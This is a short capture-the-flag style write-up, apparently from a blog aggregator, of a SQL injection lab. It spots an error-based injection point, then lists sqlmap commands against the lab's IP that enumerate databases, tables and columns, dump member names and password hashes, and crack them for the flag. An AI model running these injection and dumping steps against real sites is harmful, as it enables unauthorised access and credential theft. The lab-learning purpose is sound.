当前位置:网站首页>Moher College - SQL injection vulnerability test (error reporting and blind note)
Moher College - SQL injection vulnerability test (error reporting and blind note)
2022-06-27 00:27:00 【Lyswbb】
Preface
This article is for technical discussion only , Study , Do not use for illegal purposes , It has nothing to do with me to use it for illegal purposes !
First, get to the shooting range and review the questions , It is obvious that it is an error injection
Visit the target after getting the range
Click... Under user login Notice on platform shutdown and maintenance
Click to find url by http://124.70.71.251:46004/new_list.php?id=1
An error is reported after trying to add a single quotation mark , Discovery database is mariaDB
Got it injection point , direct sqlmap Just a shuttle
Blast the name of the warehouse
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 --dbs
Name of Pop Watch
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup --tables
Pop field name
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member --columns
detonation name and password The content of
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member -C name,password --dump 
Decrypt md5 Online decryption ,md5 Decryption encryption
Finally, you can log in and get flag
边栏推荐
- 【UVM实战 ===> Episode_3 】~ Assertion、Sequence、Property
- How to use Pinia (I) introduce Pinia into the project
- Nacos安装指南
- How to open an account on the mobile phone? Is it safe to open an account online and speculate in stocks
- Big guys talk about the experience sharing of the operation of the cutting-edge mindspore open source community. Come up with a small notebook!
- 邮箱附件钓鱼常用技法
- 巧记大小端字节序
- Common techniques of email attachment phishing
- No clue about complex data?
- [微服务]Nacos
猜你喜欢
温故知新--常温常新
Ten thousand words explanation - mindarmour Xiaobai tutorial!
Introduction to message queuing
In depth understanding of UDP in the transport layer and the use of UDP in sockets
简单快速的数网络(网络中的网络套娃)
Super hard core! Can the family photo album on Huawei's smart screen be classified automatically and accurately?
为什么EDR需要深度防御来打击勒索软件?
Redis detailed tutorial
Network in network (dolls)
![[微服務]認識微服務](/img/62/e826e692e7fd6e6e8dab2baa4dd170.png)
[微服務]認識微服務
随机推荐
网络中的网络(套娃)
论文学习——降雨场次划分方法对降雨控制率的影响分析
Oracle database basics concepts
技术干货|什么是大模型?超大模型?Foundation Model?
Is it reliable to open an account on a stock trading mobile phone? Is it safe to open an account online and speculate in stocks
Is it safe to open an account on the mobile phone to buy stocks? Is it safe to open an account on the Internet to speculate in stocks
How do new investors open accounts online? Is it safe to open accounts online and speculate in stocks
Let agile return to its original source -- Some Thoughts on reading the way of agile neatness
In the Internet industry, there are many certificates with high gold content. How many do you have?
深度学习方法求解平均场博弈论问题
Is it reliable to speculate in stocks by mobile phone? Is it safe to open an account and speculate in stocks online
50 tips that unity beginners can definitely use
墨者学院-X-Forwarded-For注入漏洞实战
[microservice]eureka
The fourth bullet of redis interview eight part essay (end)
[微服務]認識微服務
Pinpoint attackers with burp
Ten thousand words explanation - mindarmour Xiaobai tutorial!
如何通俗易懂的描述机器学习的流程?
Is it safe to buy pension insurance online? Is there a policy?